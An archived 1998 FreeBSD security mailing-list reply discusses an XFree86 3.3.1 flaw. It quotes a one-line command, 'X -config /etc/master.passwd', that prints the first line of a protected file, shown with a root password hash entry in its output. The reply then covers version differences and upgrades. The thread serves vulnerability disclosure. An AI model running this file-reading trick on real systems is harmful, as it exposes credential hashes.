Skip site navigation (1)Skip section navigation (2) 
Date:      Fri, 16 Oct 1998 22:42:29 +1300 (NZDT)
From:      Andrew McNaughton <andrew@squiz.co.nz>
To:        "Jan B. Koum " <jkb@best.com>
Cc:        security@FreeBSD.ORG
Subject:   Re: X allows ordinary user to read first line of any file
Message-ID:  <Pine.BSF.4.01.9810162230150.706-100000@aniwa.sky>
In-Reply-To: <19981016022311.A753@best.com>
next in thread | previous in thread | raw e-mail | index | archive | help 
On Fri, 16 Oct 1998, Jan B. Koum  wrote:

> On Fri, Oct 16, 1998 at 06:08:02PM +1300, Andrew McNaughton <andrew@squiz.co.nz> wrote:
> > 
> > found this on http://www.hoobie.net/security/exploits/
> > 
> > joeuser@host$ X -config /etc/master.passwd
> > Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie
> > use: X [:<display>] [option]
> 
>         I am sure something will correct me, but I think you are running
>         the 3.3.1 version which is vulnerable I guess. It is old. You should
>         really upgrade. The new release doesn't even have the -config       
>         options as far as I can tell:                                       
> 
> % bin/XF86_SVGA -version
> [...]                   
> XFree86 Version 3.3.2.3 / X Window System
> Operating System: FreeBSD 3.0-CURRENT i386 [ELF]
> [...]
> % bin/XF86_SVGA -config /etc/master.passwd
> bin/XF86_SVGA -config /etc/master.passwd
> Unrecognized option: -config            
> 
>         I am not sure if 3.0 will ship with 3.3.2.3 - Jordan?
> 
>         I myself use XiG product (hence limited knowledge of XFree86) and
>         that also seem fine at first glance.                             
> 
>         BTW, wouldn't you kind of consider this to be a bug in XFree86 rather
>         then a bug in FreeBSD OS? :)                                         

Yes it is 3.3.1, and yes the problem is with XFree86 rather than FreeBSD
itself. Xfree86 came with my version of FreeBSD 2.2.5.  Perhaps that's old
enough to let it go, but this list regularly seems to cover software used
by FreeBSD users outside of the operating system itself.  Seemed worth a
comment.

What version of Xfree86 is in the latest 2.2-STABLE?

Andrew


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.01.9810162230150.706-100000>